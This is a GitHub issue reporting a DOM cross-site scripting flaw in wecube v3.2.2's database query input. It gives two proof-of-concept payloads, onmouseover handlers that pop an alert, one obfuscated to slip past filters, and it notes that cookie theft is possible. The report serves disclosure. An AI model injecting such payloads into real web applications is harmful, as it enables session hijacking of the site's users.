Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') #2328

Open
0x30Rizk opened this issue Aug 5, 2022 · 0 comments
Labels
bug Something isn't working

Comments

@0x30Rizk
Copy link

0x30Rizk commented Aug 5, 2022

描述您遇到的bug
DOM XSS存在資料庫查詢語句中,wecube v3.2.2

如何重现
`
輸入
select < b onmouseover="window['ale'+'rt']('DOM XSS')">hello

select < b onmouseover='alert("XSS")'>hello
`
Notes:請刪除< 空格
预期行为
javascript允許執行,可以竊取cookie

截图
01
02

附加

@0x30Rizk 0x30Rizk added the bug Something isn't working label Aug 5, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

No branches or pull requests

1 participant